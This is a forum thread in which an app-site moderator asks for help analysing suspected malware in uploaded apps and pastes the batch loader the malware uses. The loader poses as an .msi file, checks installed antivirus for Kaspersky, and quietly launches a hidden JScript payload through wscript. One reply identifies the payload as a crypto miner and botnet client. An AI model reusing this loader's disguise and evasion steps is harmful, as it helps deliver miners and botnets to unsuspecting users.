Hi! I need help determining whether JS code is malicious, or what it really does

Hi community! I'm a moderator on a site where people can upload apps. We try to keep our apps free of any kind of infection, but as far as my skill set goes, I'll need help to determine what a JS code I found does. Many of our users complained about apps from one of our uploaders; they said the apps were infected and that it was JS code hijacking wscript in Task Manager, claiming it is a keylogger or some spyware. I have been able to do some reverse engineering on some of his/her apps and ended up with a *.js file from each of his/her uploads that were very similar to each other. It was unreadable/compressed, so I decompressed it and it got a little more readable, but still, I think it's encrypted somehow. So this is as far as my skill set goes, and I would like to ask anyone in this community if someone could have a look at the code to see if it has any malicious intent or not, and what it really does. Best regards

JavaScript

9 Comment(s)

@VITSUSA Jun 22, 2020 — Click on the mentioned hyperlink to learn what JS code really does:

https://developer.mozilla.org/en-US/docs/Learn/JavaScript/First_steps/What_is_JavaScript#:~:text=JavaScript%20is%20a%20scripting%20or,3D%20graphics%2C%20scrolling%20video%20jukeboxes%2C
@ssk5 (author) Jun 22, 2020 — I can't really recognise much from that link in the code I have, other than "function" and some others.
@ssk5 (author) Jun 22, 2020 — I think it's encrypted; could I post the pastebin URL here and maybe someone could guide me on how to make it readable?

Help would be very much appreciated, as this is a serious case on our site.
@ssk5 (author) Jun 24, 2020 — https://pastebin.com/sTjecBHE

Can someone recognise this as JavaScript, or is it encrypted JavaScript?
@NogDog Jun 24, 2020 — Barring someone actually figuring out what is being obfuscated in that code, you could always delete it and see if anything breaks. If nothing breaks, it's probably malicious. If something does break, it **_may_** be obfuscated code that the developer wanted to make hard to re-use/reverse-engineer, in which case you'd need to talk to that developer.
@ssk5 (author) Jun 26, 2020 — NogDog, thanks! First I deleted the batch script calling AdobePIM (JavaScript file) and the *.bat file itself, but then the setup deleted itself after I ran it (with AV disabled). Then I left the bat file and JS file there and just edited the JS file with random words (messing up the code), and it installed fine and things worked. Weird, no? As the uploader of this app had scripted in code that if those files don't exist, then don't run the "malware" or whatever code the JS is..
@ssk5 (author) Jun 26, 2020 — Here is the ADC_Version.msi file that gets renamed to ADC_Version.bat when clicking on the setup exe:

��&cls
rem The two bytes before the ampersand are not printable characters; cmd reports
rem them as an unrecognised command and the cls that follows clears that message.
rem The namespace backslashes and the redirection character in the timeout lines
rem did not survive being pasted into the forum and are restored below.
@echo off
cd ../../Tools
setlocal enableDelayedExpansion enableextensions

rem Collect the display names of every antivirus product registered with WMI
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F

rem Branch on whether any of those names matches kasper, i.e. Kaspersky
set "regexp=.*kasper.*"
echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (
    rem Kaspersky found: swap Tools.dat in as Set-up.exe, run it, skip the JScript
    move Tools.dat ../Set-up.exe
    start ../Set-up.exe
    echo " "
) || (
    rem No Kaspersky: stash the launcher as Tools.data, note: not Tools.dat
    echo " "
    cd ../
    move Set-up.exe Tools/Tools.data
    timeout 1 >nul 2>&1
    cd packages/ADC
    if exist AdobePIM (
        rem Run the installer, then the extension-less AdobePIM file as JScript
        cd ../../Tools
        move Tools.dat ../Set-up.exe
        timeout 1 >nul 2>&1
        start ../Set-up.exe
        cd ../packages/ADC
        start wscript //E:jscript AdobePIM %1
    ) else (
        echo "Error : Please Extract compressed file first ..."
        pause
    )
)

rem Give the script its .msi name back so it looks like an installer package
rename ADC_Version.2020.bat ADC_Version.2020.msi
@ssk5 (author) Jun 26, 2020 — AdobePIM = AdobePIM.js
@Sayathana Jul 07, 2020 — It's a crypto miner and a very braindead botnet client; vet your users more carefully.